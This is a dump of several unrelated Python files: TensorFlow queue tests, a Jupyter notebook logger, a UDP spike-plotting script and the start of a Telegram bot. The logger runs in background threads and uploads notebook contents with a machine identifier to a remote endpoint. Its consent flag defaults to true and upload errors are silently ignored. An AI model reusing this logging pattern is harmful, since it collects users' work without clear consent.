def testBlockingEnqueueManyToFullQueue(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(4, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
sess.run(blocking_enqueue_op)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The dequeue ops should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
for elem in elems:
self.assertEqual([elem], dequeued_t.eval())
time.sleep(0.01)
self.assertEqual([50.0], dequeued_t.eval())
self.assertEqual([60.0], dequeued_t.eval())
def testBlockingEnqueueBeforeClose(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(4, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue((50.0,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
# Expect the operation to succeed once the dequeue op runs.
sess.run(blocking_enqueue_op)
enqueue_thread = self.checkedThread(target=blocking_enqueue)
enqueue_thread.start()
# The close_op should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
def close():
sess.run(close_op)
close_thread = self.checkedThread(target=close)
close_thread.start()
# The dequeue will unblock both threads.
self.assertEqual(10.0, dequeued_t.eval())
enqueue_thread.join()
close_thread.join()
for elem in [20.0, 30.0, 40.0, 50.0]:
self.assertEqual(elem, dequeued_t.eval())
self.assertEqual(0, q.size().eval())
def testBlockingEnqueueManyBeforeClose(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(4, tf.float32, ((),))
elems = [10.0, 20.0, 30.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
sess.run(blocking_enqueue_op)
enqueue_thread = self.checkedThread(target=blocking_enqueue)
enqueue_thread.start()
# The close_op should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
def close():
sess.run(close_op)
close_thread = self.checkedThread(target=close)
close_thread.start()
# The dequeue will unblock both threads.
self.assertEqual(10.0, dequeued_t.eval())
enqueue_thread.join()
close_thread.join()
for elem in [20.0, 30.0, 50.0, 60.0]:
self.assertEqual(elem, dequeued_t.eval())
def testDoesNotLoseValue(self):
with self.test_session():
q = tf.PaddingFIFOQueue(1, tf.float32, ((),))
enqueue_op = q.enqueue((10.0,))
size_t = q.size()
enqueue_op.run()
for _ in range(500):
self.assertEqual(size_t.eval(), [1])
def testSharedQueueSameSession(self):
with self.test_session():
q1 = tf.PaddingFIFOQueue(
1, tf.float32, ((),), shared_name="shared_queue")
q1.enqueue((10.0,)).run()
q2 = tf.PaddingFIFOQueue(
1, tf.float32, ((),), shared_name="shared_queue")
q1_size_t = q1.size()
q2_size_t = q2.size()
self.assertEqual(q1_size_t.eval(), [1])
self.assertEqual(q2_size_t.eval(), [1])
self.assertEqual(q2.dequeue().eval(), [10.0])
self.assertEqual(q1_size_t.eval(), [0])
self.assertEqual(q2_size_t.eval(), [0])
q2.enqueue((20.0,)).run()
self.assertEqual(q1_size_t.eval(), [1])
self.assertEqual(q2_size_t.eval(), [1])
self.assertEqual(q1.dequeue().eval(), [20.0])
self.assertEqual(q1_size_t.eval(), [0])
self.assertEqual(q2_size_t.eval(), [0])
def testIncompatibleSharedQueueErrors(self):
with self.test_session():
q_a_1 = tf.PaddingFIFOQueue(10, tf.float32, ((),), shared_name="q_a")
q_a_2 = tf.PaddingFIFOQueue(15, tf.float32, ((),), shared_name="q_a")
q_a_1.queue_ref.eval()
with self.assertRaisesOpError("capacity"):
q_a_2.queue_ref.eval()
q_b_1 = tf.PaddingFIFOQueue(10, tf.float32, ((),), shared_name="q_b")
q_b_2 = tf.PaddingFIFOQueue(10, tf.int32, ((),), shared_name="q_b")
q_b_1.queue_ref.eval()
with self.assertRaisesOpError("component types"):
q_b_2.queue_ref.eval()
q_c_1 = tf.PaddingFIFOQueue(10, tf.float32, ((),), shared_name="q_c")
q_c_2 = tf.PaddingFIFOQueue(
10, tf.float32, shapes=[(1, 1, 2, 3)], shared_name="q_c")
q_c_1.queue_ref.eval()
with self.assertRaisesOpError("component shapes"):
q_c_2.queue_ref.eval()
q_d_1 = tf.PaddingFIFOQueue(
10, tf.float32, shapes=[(1, 1, 2, 3)], shared_name="q_d")
q_d_2 = tf.PaddingFIFOQueue(10, tf.float32, ((),), shared_name="q_d")
q_d_1.queue_ref.eval()
with self.assertRaisesOpError("component shapes"):
q_d_2.queue_ref.eval()
q_e_1 = tf.PaddingFIFOQueue(
10, tf.float32, shapes=[(1, 1, 2, 3)], shared_name="q_e")
q_e_2 = tf.PaddingFIFOQueue(
10, tf.float32, shapes=[(1, 1, 2, 4)], shared_name="q_e")
q_e_1.queue_ref.eval()
with self.assertRaisesOpError("component shapes"):
q_e_2.queue_ref.eval()
q_f_1 = tf.PaddingFIFOQueue(10, tf.float32, ((),), shared_name="q_f")
q_f_2 = tf.PaddingFIFOQueue(
10, (tf.float32, tf.int32), ((), ()), shared_name="q_f")
q_f_1.queue_ref.eval()
with self.assertRaisesOpError("component types"):
q_f_2.queue_ref.eval()
def testSelectQueue(self):
with self.test_session():
num_queues = 10
qlist = list()
for _ in xrange(num_queues):
qlist.append(tf.PaddingFIFOQueue(10, tf.float32, ((),)))
# Enqueue/Dequeue into a dynamically selected queue
for _ in xrange(20):
index = np.random.randint(num_queues)
q = tf.PaddingFIFOQueue.from_list(index, qlist)
q.enqueue((10.,)).run()
self.assertEqual(q.dequeue().eval(), 10.0)
def testSelectQueueOutOfRange(self):
with self.test_session():
q1 = tf.PaddingFIFOQueue(10, tf.float32, ((),))
q2 = tf.PaddingFIFOQueue(15, tf.float32, ((),))
enq_q = tf.PaddingFIFOQueue.from_list(3, [q1, q2])
with self.assertRaisesOpError("Index must be in the range"):
enq_q.dequeue().eval()
def _blockingDequeue(self, sess, dequeue_op):
with self.assertRaisesOpError("Dequeue operation was cancelled"):
sess.run(dequeue_op)
def _blockingDequeueMany(self, sess, dequeue_many_op):
with self.assertRaisesOpError("Dequeue operation was cancelled"):
sess.run(dequeue_many_op)
def _blockingEnqueue(self, sess, enqueue_op):
with self.assertRaisesOpError("Enqueue operation was cancelled"):
sess.run(enqueue_op)
def _blockingEnqueueMany(self, sess, enqueue_many_op):
with self.assertRaisesOpError("Enqueue operation was cancelled"):
sess.run(enqueue_many_op)
def testResetOfBlockingOperation(self):
with self.test_session() as sess:
q_empty = tf.PaddingFIFOQueue(5, tf.float32, ((),))
dequeue_op = q_empty.dequeue()
dequeue_many_op = q_empty.dequeue_many(1)
q_full = tf.PaddingFIFOQueue(5, tf.float32, ((),))
sess.run(q_full.enqueue_many(([1.0, 2.0, 3.0, 4.0, 5.0],)))
enqueue_op = q_full.enqueue((6.0,))
enqueue_many_op = q_full.enqueue_many(([6.0],))
threads = [
self.checkedThread(self._blockingDequeue, args=(sess, dequeue_op)),
self.checkedThread(self._blockingDequeueMany, args=(sess,
dequeue_many_op)),
self.checkedThread(self._blockingEnqueue, args=(sess, enqueue_op)),
self.checkedThread(self._blockingEnqueueMany, args=(sess,
enqueue_many_op))]
for t in threads:
t.start()
time.sleep(0.1)
sess.close() # Will cancel the blocked operations.
for t in threads:
t.join()
def testBigEnqueueMany(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(5, tf.int32, ((),))
elem = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
enq = q.enqueue_many((elem,))
deq = q.dequeue()
size_op = q.size()
enq_done = []
def blocking_enqueue():
enq_done.append(False)
# This will fill the queue and then block until enough dequeues happen.
sess.run(enq)
enq_done.append(True)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The enqueue should start and then block.
results = []
results.append(deq.eval()) # Will only complete after the enqueue starts.
self.assertEqual(len(enq_done), 1)
self.assertEqual(sess.run(size_op), 5)
for _ in range(3):
results.append(deq.eval())
time.sleep(0.1)
self.assertEqual(len(enq_done), 1)
self.assertEqual(sess.run(size_op), 5)
# This dequeue will unblock the thread.
results.append(deq.eval())
time.sleep(0.1)
self.assertEqual(len(enq_done), 2)
thread.join()
for i in range(5):
self.assertEqual(size_op.eval(), 5 - i)
results.append(deq.eval())
self.assertEqual(size_op.eval(), 5 - i - 1)
self.assertAllEqual(elem, results)
def testBigDequeueMany(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(2, tf.int32, ((),))
elem = np.arange(4, dtype=np.int32)
enq_list = [q.enqueue((e,)) for e in elem]
deq = q.dequeue_many(4)
results = []
def blocking_dequeue():
# Will only complete after 4 enqueues complete.
results.extend(sess.run(deq))
thread = self.checkedThread(target=blocking_dequeue)
thread.start()
# The dequeue should start and then block.
for enq in enq_list:
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.assertEqual(len(results), 0)
sess.run(enq)
# Enough enqueued to unblock the dequeue
thread.join()
self.assertAllEqual(elem, results)
def testDtypes(self):
with self.test_session() as sess:
dtypes = [tf.float32, tf.float64, tf.int32, tf.uint8, tf.int16, tf.int8,
tf.int64, tf.bool, tf.complex64]
shape = (32, 4, 128)
q = tf.PaddingFIFOQueue(32, dtypes, [shape[1:]] * len(dtypes))
input_tuple = []
for dtype in dtypes:
np_dtype = dtype.as_numpy_dtype
np_array = np.random.randint(-10, 10, shape)
if dtype == tf.bool:
np_array = np_array > 0
elif dtype == tf.complex64:
np_array = np.sqrt(np_array.astype(np_dtype))
else:
np_array = np_array.astype(np_dtype)
input_tuple.append(np_array)
q.enqueue_many(input_tuple).run()
output_tuple_t = q.dequeue_many(32)
output_tuple = sess.run(output_tuple_t)
for (input_elem, output_elem) in zip(input_tuple, output_tuple):
self.assertAllEqual(input_elem, output_elem)
def testUnknownRank(self):
with self.assertRaisesRegexp(ValueError, "must have a defined rank"):
tf.PaddingFIFOQueue(32, [tf.float32], [tf.TensorShape(None)])
if __name__ == "__main__":
tf.test.main()
|
OnlineLogger.py
|
import os
import sys
import time
import threading
import json
import datetime
import random
import requests
import uuid
from pathlib import Path
import zipfile
class Watcher(object):
running = True
refresh_delay_secs = 1
# Constructor
def __init__(self, watch_file, call_func_on_change=None, *args, **kwargs):
self._cached_stamp = 0
self.filename = watch_file
self.call_func_on_change = call_func_on_change
self.args = args
self.kwargs = kwargs
# Look for changes
def look(self):
stamp = os.stat(self.filename).st_mtime
if stamp != self._cached_stamp:
self._cached_stamp = stamp
# File has changed, so do something...
if self.call_func_on_change is not None:
self.call_func_on_change(*self.args, **self.kwargs)
# Keep watching in a loop
def watch(self):
while self.running:
try:
# Look for changes
time.sleep(self.refresh_delay_secs)
self.look()
except KeyboardInterrupt:
#print('\nDone')
break
except FileNotFoundError:
#print('File was not found. Please do not change notebook name nor change location relative to logger.py. Rerun intiliaztion cell once filename/location is fixed.')
break
except:
#print('Stopping logging: Unhandled error: %s' % sys.exc_info())
return
class Pusher(object):
running = True
refresh_delay_secs = 1
# Constructor
def __init__(self, log_file, call_func_on_change=None, *args, **kwargs):
self._cached_stamp = 0
self.filename = log_file
self.call_func_on_change = call_func_on_change
self.args = args
self.kwargs = kwargs
# Look for changes
def look(self):
if (not os.path.isfile(self.filename)):
return
stamp = os.stat(self.filename).st_mtime
if stamp != self._cached_stamp:
self._cached_stamp = stamp
# File has changed, so do something...
if self.call_func_on_change is not None:
self.call_func_on_change(*self.args, **self.kwargs)
# Keep watching in a loop
def watch(self):
while self.running:
try:
# Look for changes
time.sleep(self.refresh_delay_secs)
self.look()
except KeyboardInterrupt:
#print('\nDone')
break
except FileNotFoundError:
#print('File was not found. Please do not change notebook name nor change location relative to logger.py. Rerun intiliaztion cell once filename/location is fixed.')
break
except:
#print('Stopping logging: Unhandled error: %s' % sys.exc_info())
return
def get_same_length_change(old_checkpoint, current_checkpoint):
change_count = 0
cell_array_number = []
cell_change_array = []
for i in range(0, len(current_checkpoint['cells'])):
old_cell = old_checkpoint['cells'][i]
new_cell = current_checkpoint['cells'][i]
if (old_cell != new_cell):
change_count += 1
cell_array_number.append(i)
cell_change_array.append(new_cell)
return change_count, cell_array_number, cell_change_array
def get_new_cell_set(new_checkpoint):
return 0, [], new_checkpoint['cells']
def get_changed_cells(old_checkpoint, current_checkpoint):
if len(old_checkpoint['cells']) == len(current_checkpoint['cells']):
num_changes, cells_changed, new_contents = get_same_length_change(old_checkpoint, current_checkpoint)
return num_changes, cells_changed, "cells_changed", new_contents
if len(old_checkpoint['cells']) != len(current_checkpoint['cells']):
num_changes, cells_changed, new_contents = get_new_cell_set(current_checkpoint)
return num_changes, cells_changed, "all_cell_refresh", new_contents
return 0, [], "error", []
def get_diff_dict(old_checkpoint, current_checkpoint, current_time):
diff_dict = {}
num_changes, cell_changed, change_type, new_content = get_changed_cells(old_checkpoint, current_checkpoint)
diff_dict.update({'time' : current_time,
"num_changes" : num_changes,
"cells_changed" : cell_changed,
"change_type" : change_type,
"new_contents" : new_content
})
return diff_dict
def parse_lines(line_array):
new_array = []
for i in line_array:
if len(i) > 200:
new_line = i[0:200]
new_line = new_line + "\n"
new_array.append(new_line)
continue
new_array.append(i)
return new_array
def parse_cell(current_cell):
if "outputs" not in current_cell:
return current_cell
all_outputs = current_cell['outputs']
if len(all_outputs) == 0:
return current_cell
new_outputs = []
for i in all_outputs:
if "text" not in i:
new_outputs.append(i)
continue
all_text = i['text']
all_text = parse_lines(all_text)
if len(all_text) < 20:
new_outputs.append(i)
continue
new_text = all_text[0:20]
i.update({'text' : new_text})
new_outputs.append(i)
current_cell.update({'outputs' : new_outputs})
return current_cell
def parse_checkpoint(current_checkpoint):
cells = current_checkpoint['cells']
new_cells = []
for i in cells:
if i['cell_type'] != "code":
new_cells.append(i)
continue
new_cell = parse_cell(i)
new_cells.append(new_cell)
current_checkpoint.update({'cells': new_cells})
return current_checkpoint
def push_log(log_filename):
if os.path.isfile(not log_filename):
return
log = None
with open(log_filename, 'r') as f:
log = json.loads(f.read())
push_to_cloud(log)
def push_to_cloud(log):
url = 'https://us-south.functions.appdomain.cloud/api/v1/web/ORG-UNC-dist-seed-james_dev/cyverse/add-cyverse-log'
help_data = {
"body": {
"log_id": log['log_id'],
"machine_id": log['machine_id'],
"course_id": log['course_id'],
"log_type": "Jupyter",
"log": log
}
}
try :
requests.post(url, json=help_data)
except:
pass
# Call this function each time a change happens
def logger(base_filename, course_id):
src_path = os.path.realpath(base_filename)
dir_path = os.path.dirname(src_path)
historicalSize = -1
while (historicalSize != os.path.getsize(src_path)):
historicalSize = os.path.getsize(src_path)
time.sleep(0.25)
with open(src_path, 'r') as checkpoint_source:
checkpoint = json.loads(checkpoint_source.read())
checkpoint = parse_checkpoint(checkpoint)
log = Path(os.path.join(dir_path, base_filename.split('.')[0]+'_log.json'))
if log.is_file():
old = ''
with open(log, 'r') as f:
try:
old = json.loads(f.read())
except json.decoder.JSONDecodeError:
#print('There is an error decoding log. Log file may be corrupt')
return
current_checkpoint = old['current_checkpoint']['checkpoint']
should_update = current_checkpoint != checkpoint
if should_update:
with open(log, 'w') as f:
current_time = str(datetime.datetime.now())
old["diffs"].append(get_diff_dict(current_checkpoint, checkpoint, current_time))
old['current_checkpoint'].update({
"time": current_time,
"checkpoint" : checkpoint
})
f.write(json.dumps(old))
else:
with open(log, "w") as f:
log_id = str(random.randint(10000000000000000, 99999999999999999))
mac = hex(uuid.getnode() >> 2)
machine_id = str(mac)
new = {
"log_id": log_id,
"machine_id" : machine_id,
"course_id": course_id,
"original_checkpoint":{"time":str(datetime.datetime.now()),"checkpoint":checkpoint},
"current_checkpoint" : {"time":str(datetime.datetime.now()),"checkpoint":checkpoint},
"diffs" : []
}
f.write(json.dumps(new))
def start(watch_file, course_id = "NoCourseSpecified" ,IRB_consent = True):
if IRB_consent:
print('Logging your work!')
watcher = Watcher(watch_file, logger, base_filename=watch_file, course_id=course_id)
log_file = watch_file.split('.')[0] + "_log.json"
pusher = Pusher(log_file, push_log, log_filename=log_file)
thread = threading.Thread(target=lambda: watcher.watch(), daemon=True)
thread.start()
thread_push = threading.Thread(target=lambda: pusher.watch(), daemon=True)
thread_push.start()
else:
print('Please give consent to logging data by updating agreement variable to True')
def compress_log(watch_file):
base_filename = watch_file
filename_stem = base_filename.split('.')[0]
src_path = os.path.realpath(base_filename)
dir_path = os.path.dirname(src_path)
log = Path(os.path.join(dir_path, filename_stem+'_log.json'))
if log.is_file():
log_zip = zipfile.ZipFile(filename_stem+'.compressed', 'w')
log_zip.write(log, filename_stem+'_log.json', compress_type=zipfile.ZIP_DEFLATED)
log_zip.close()
print('Compressed log to: ' + str(os.path.join(dir_path, filename_stem+'.compressed')))
else:
print('Log file not found. Nothing to compress.')
pass
def compress_full_log(full_log_file, output_log_file):
src_path = os.path.realpath(full_log_file)
dir_path = os.path.dirname(src_path)
log = full_log_file
new_log = output_log_file
old = None
with open(log, 'r') as f:
try:
old = json.loads(f.read())
except json.decoder.JSONDecodeError:
print('There is an error decoding log. Log file may be corrupt')
return
compressed_log = None
if len(old['checkpoints']) > 0:
oldest_checkpoint = old['checkpoints'][0]
newest_checkpoint = old['checkpoints'][len(old['checkpoints']) - 1]
compressed_log = {"original_checkpoint":{"time":oldest_checkpoint['time'],"checkpoint": parse_checkpoint(oldest_checkpoint['checkpoint'])},
"current_checkpoint" : {"time":newest_checkpoint['time'],"checkpoint": parse_checkpoint(newest_checkpoint['checkpoint'])},
"diffs" : []
}
for i in range(0, len(old['checkpoints']) - 1):
current_time = old['checkpoints'][i+1]['time']
compressed_log['diffs'].append(get_diff_dict(parse_checkpoint(old['checkpoints'][i]['checkpoint']), parse_checkpoint(old['checkpoints'][i + 1]['checkpoint']), current_time))
else:
return
with open(new_log, "w") as g:
g.write(json.dumps(compressed_log))
return
def get_rebuilt_cells(previous_checkpoint_cells, diff_record):
if diff_record['change_type'] == "all_cell_refresh":
return diff_record['new_contents']
all_current_cells = previous_checkpoint_cells.copy()
for i in range(0, diff_record['num_changes']):
cell_to_change = diff_record['cells_changed'][i]
all_current_cells[cell_to_change] = diff_record['new_contents'][i]
return all_current_cells
def decompress_compressed_log(compressed_log, output_full_file):
compressed = None
with open(compressed_log, 'r') as f:
try:
compressed = json.loads(f.read())
except json.decoder.JSONDecodeError:
print('There is an error decoding log. Log file may be corrupt')
return
full_log = {"checkpoints" : []}
starting_checkpoint = compressed['original_checkpoint']
full_log['checkpoints'].append(starting_checkpoint)
for i in range(0, len(compressed['diffs'])):
diff_info = compressed['diffs'][i]
new_cell_array = get_rebuilt_cells(starting_checkpoint['checkpoint']['cells'], diff_info)
checkpoint_dict = {}
checkpoint_dict.update({
"time" : diff_info['time'],
"checkpoint" : {'cells' : new_cell_array,
'metadata' : starting_checkpoint['checkpoint']['metadata'],
'nbformat' : starting_checkpoint['checkpoint']['nbformat'],
'nbformat_minor': starting_checkpoint['checkpoint']['nbformat_minor']}
})
full_log['checkpoints'].append(checkpoint_dict)
starting_checkpoint = checkpoint_dict
with open(output_full_file, "w") as g:
g.write(json.dumps(full_log))
return
|
OnlineSpikePlot.py
|
#!/usr/bin/env python
'''
This is the input node that receives spikes and generates a plot.
LINUX VERSION!
'''
import numpy
import socket
import sys
import argparse
import matplotlib.pyplot as plt
import time
from multiprocessing import Process, Pipe
from select import select
# import os, signal
# to read back the generated file
# import json
# with open('my_file') as f:
# my_list = [json.loads(line) for line in f]
def converts_spikes_into_plot(spike_numpy_array, x, y, step):
"""
spike_numpy_array => the numpy array received directly from my system (a numpy array with 1's and 0's) and the
same length as NumOfNeuronsInput.
returns a plot line object
"""
for i,j in zip(spike_numpy_array,range(len(spike_numpy_array))):
if i==1: # Is there a spike in the index j?
x.append(step)
y.append(j)
return (x,y)
def saves_to_file(spikes_pipe_in, filename):
"""
"""
start_time=time.time()*1000.0 # time in milliseconds
while True:
x=list()
y=list()
if select([spikes_pipe_in],[],[]):
time_step=int(time.time()*1000.0 - start_time)
x,y = converts_spikes_into_plot(spikes_pipe_in.recv(), x, y, time_step)
with open(filename,"a") as f:
f.write(str([x,y]))
f.write('\n')
def draw_plots(spikes_pipe_in, cmd_pipe_in, number_of_neurons, save_file):
print "Starting Online Spike Plot"
fig = plt.figure()
plt.title("Real time Spike Plot")
step=0
time_step=0
start_time=time.time()*1000.0 # time in milliseconds
x=list()
y=list()
# Until this point, the code is going to be executed only once each time the system runs.
try:
while True:
if select([spikes_pipe_in],[],[]):
if spikes_pipe_in.poll():
time_step=int(time.time()*1000.0 - start_time)
# plt.axis([start_time,time_step+1,-1,number_of_neurons])
plt.ylim(-1,number_of_neurons)
# Adjusts the axes according to the number of spikes published.
x,y = converts_spikes_into_plot(spikes_pipe_in.recv(), x, y, time_step)
# plt.scatter(x,y)
plt.plot(x,y,'b.')
step+=1
if step > steps:
step=0
# start_time=time.time()*1000.0 # time in milliseconds
x=[]
y=[]
plt.pause(0.0001)
plt.clf()
# Here the figure is created / updated.
except KeyboardInterrupt:
if args.save != 'None': # Here is 'None' as a string because this is how the user can enter at command line.
print
print "Saving figure! Wait..."
fig.savefig(save_file)
print "Saving figure! Wait...Done!"
# sys.exit(0)
def read_UDP(pipe_out_draw, pipe_out_file, IPI, PORTI, number_of_neurons, clean):
"""
This function simply creates a socket, reads all the UDP packets as they arrive and redirects to a multiprocessing.Pipe.
IPI = "X.X.X.X" ordinary IP address from one of the network interfaces
PORTI = 0 to 65535 (but you need to choose a free one)
number_of_neurons = is the size of the spike train
pipe_out = multiprocessing.Pipe used to send the information received through UDP to the draw_plots
clear = when True cleans the receiving buffer before start
"""
buffer_size = 8 + number_of_neurons # Each element of the numpy.array with the uint8 occupies 1 byte.
# So, the brian_address has 8 elements, therefore 8 bytes.
# number_of_neurons: because each neuron occupies 1 byte (numpy.uint8)
sockI = socket.socket(socket.AF_INET, # IP
socket.SOCK_DGRAM) # UDP
sockI.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # Tells the OS that if someone else is using the PORT, it
# can use the same PORT without any error/warning msg.
# Actually this is useful because if you restart the simulation
# the OS is not going to release the socket so fast and an error
# could occur.
sockI.bind((IPI, PORTI)) # Bind the socket to the IPI/PORTI
if clean:
clean_loop = 1
while clean_loop:
print "Cleaning receiving buffer...", "IP/PORT:", IPI, "/", PORTI
try:
data = sockI.recv(1, socket.MSG_DONTWAIT) # buffer size is 1 byte, NON blocking.
print data
except IOError: # The try and except are necessary because the recv raises a error when no data is received
clean_loop = 0
print "Cleaning receiving buffer...", "IP/PORT:", IPI, "/", PORTI, "...Done!"
sockI.setblocking(1) # Tells the system that the socket recv() method will DO block until a packet is received
while True:
# Receives the spike train from the pipe, converts according to the converts_spikes_into_plot function
try:
received_raw_data = sockI.recv(buffer_size) # This is a blocking command, therefore the while loop is not going
# to eat up all the processor time.
numpy_data = numpy.fromstring(received_raw_data[8:], dtype=numpy.uint8)
pipe_out_draw.send(numpy_data)
if filename != None:
pipe_out_file.send(numpy_data)
# The first 8 bytes are the brian_address, so I don't need them here
except IOError: # Without the IOError even the keyboard "control+C" is caught here!
print "UDP read error?"
pass
except ValueError:
print "ValueError:", data # DEBUG!
pass #the data is corrupted, a wrong package appeared at the port, etc...
except KeyboardInterrupt:
pass # Just to disable the msgs...
if __name__=="__main__":
# Process the information received from the command line arguments.
parser = argparse.ArgumentParser(description="Generate a \"real time\" plot of the spikes comming from the IP/PORT.")
parser.add_argument("--IP", help="IP Address to receive the spikes.", type=str, default="192.168.1.100")
parser.add_argument("--PORT", help="PORT to receive the spikes.", type=int, default=30303)
parser.add_argument("--NON", help="Number of neurons the spike train has.", type=int, default=600)
parser.add_argument("--steps", help="Number of steps to be plotted.", type=int, default=100)
parser.add_argument("--file", help="Saves the data received to a file.", type=str, default=None)
parser.add_argument("--save", help="Saves the figure after receive a Ctrl+C. If set as None, nothing is saved.", type=str, default="OnlineSpikePlot" + str(time.time()) + ".png")
parser.add_argument("--clean", help="Cleans the receiving buffer before start.", action="store_true")
args=parser.parse_args()
steps = args.steps
filename = args.file
IPI = args.IP
PORTI = args.PORT
number_of_neurons = args.NON
command_r, command_w = Pipe(duplex=False)
UDP_draw_r, UDP_draw_w = Pipe(duplex=False)
UDP_file_r, UDP_file_w = Pipe(duplex=False)
generate_plots = Process(target=draw_plots, args=(UDP_draw_r, command_r, number_of_neurons, args.save))
read_socket = Process(target=read_UDP, args=(UDP_draw_w, UDP_file_w, IPI, PORTI, number_of_neurons, args.clean))
if filename != None:
save_plots = Process(target=saves_to_file, args=(UDP_file_r, filename))
generate_plots.daemon = True # Guarantees the process will die after the main python
if filename != None:
save_plots.daemon = True # Guarantees the process will die after the main python
read_socket.daemon = True # Guarantees the process will die after the main python
read_socket.start()
generate_plots.start()
if filename != None:
save_plots.start()
try:
while True:
print "Run!"
if select([],[],[]):
print "Never!"
pass
except KeyboardInterrupt:
print
if args.save != "None":
time.sleep(5) # Gives time to save the image
read_socket.terminate()
generate_plots.terminate()
if filename != None:
save_plots.terminate()
time.sleep(.1)
sys.exit("Exiting the online spike plot!")
# os.kill(os.getppid(), signal.SIGQUIT) #or signal.SIGKILL
|
__main__.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# MIT License
# Copyright (c) 2020 Stɑrry Shivɑm // This file is part of AcuteBot
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os, sys, importlib
from threading import Thread
from acutebot import LOG, dp, updater, DEV_ID
from acutebot.funcs import ALL_FUNCS
import acutebot.helpers.strings as st
from telegram import InlineKeyboardMarkup, InlineKeyboardButton
from telegram.ext.dispatcher import run_async
from telegram.ext import CommandHandler, CallbackQueryHandler, Filters
# Import all funcs in main
for func_name in ALL_FUNCS:
imported_module = importlib.import_module("acutebot.funcs." + func_name)
class Starter:
def __init__(self, name):
self.photo = "https://telegra.ph/file/47a7fb822017512f0ee65.jpg"
self.text = st.START_STRING.format(name)
self.reply_markup = InlineKeyboardMarkup(
[
[
InlineKeyboardButton(
text="Movie", switch_inline_query_current_chat="<movie> ",
),
InlineKeyboardButton(
text="TVshow", switch_inline_query_current_chat="<tv> ",
),
InlineKeyboardButton(
text="Anime", switch_inline_query_current_chat="<anime> ",
),
],
[InlineKeyboardButton(text="Help and Commands❔", callback_data="help")],
]
)
@run_async
def start(update, context):
if update.effective_chat.type == "private":
stuff = Starter(update.effective_user.first_name)
return update.effective_message.reply_photo(
photo=stuff.photo, caption=stuff.text, reply_markup=stuff.reply_markup
)
update.effective_message.reply_text(st.START_STRING_GRP)
@run_async
def help_button(update, context=None):
query = update.callback_query
query.answer()
query.message.edit_caption(
caption=st.HELP_STR,
reply_markup=InlineKeyboardMarkup(
[
[
InlineKeyboardButton(text="Movies & TV", callback_data="h_mv"),
InlineKeyboardButton(
text="Music & lyrics", callback_data="h_music"
),
],
[
InlineKeyboardButton(text="Anime & manga", callback_data="h_anime"),
InlineKeyboardButton(text="Miscellaneous", callback_data="h_misc"),
],
[
InlineKeyboardButton(
text="🖤 About and donate 🖤", callback_data="h_about"
)
],
[InlineKeyboardButton(text="Go back 🔙", callback_data="back_btn")],
]
),
)
def h_for_funcs(update, context):
query = update.callback_query
query.answer()
match = query.data.split("_")[1]
markup = InlineKeyboardMarkup(
[[InlineKeyboardButton(text="Go back 🔙", callback_data="back_btn_help")]]
)
if match == "mv":
query.message.edit_caption(caption=st.MOVIE_HELP, reply_markup=markup)
elif match == "music":
query.message.edit_caption(caption=st.MUSIC_HELP, reply_markup=markup)
elif match == "anime":
query.message.edit_caption(caption=st.ANIME_HELP, reply_markup=markup)
elif match == "misc":
query.message.edit_caption(caption=st.MISC_HELP, reply_markup=markup)
elif match == "about":
query.message.edit_caption(
caption=st.ABOUT_STR,
reply_markup=InlineKeyboardMarkup(
[
[
InlineKeyboardButton(
text="Github 🔭", url="https://github.com/starry69"
),
InlineKeyboardButton(
text="Donate 🖤", url="paypal.me/starryrays"
),
],
[
InlineKeyboardButton(
text="Go back 🔙", callback_data="back_btn_help"
)
],
]
),
)
@run_async
def back_btn(update, context):
query = update.callback_query
query.answer()
match = query.data.split("_")
if "help" in match:
return help_button(update)
stuff = Starter(update.effective_user.first_name)
query.message.edit_caption(caption=stuff.text, reply_markup=stuff.reply_markup)
BANNER = r"""
___ ___ ______ ___
/ _ \ | | | ___ \ | |
/ /_\ \ ___ _ _| |_ ___| |_/ / ___ | |_
| _ |/ __| | | | __/ _ \ ___ \/ _ \| __|
| | | | (__| |_| | || __/ |_/ / (_) | |_
\_| |_/\___|\__,_|\__\___\____/ \___/ \__|
Is Running 🎶🎶🎵
"""
def main():
def stop_and_restart():
updater.stop()
os.execl(sys.executable, sys.executable, *sys.argv)
def restart(update, context):
context.bot.sendMessage(update.effective_chat.id, "Rebooted ✨")
Thread(target=stop_and_restart).start()
restart_handler = CommandHandler("reboot", restart, filters=Filters.user(DEV_ID))
start_handler = CommandHandler("start", start)
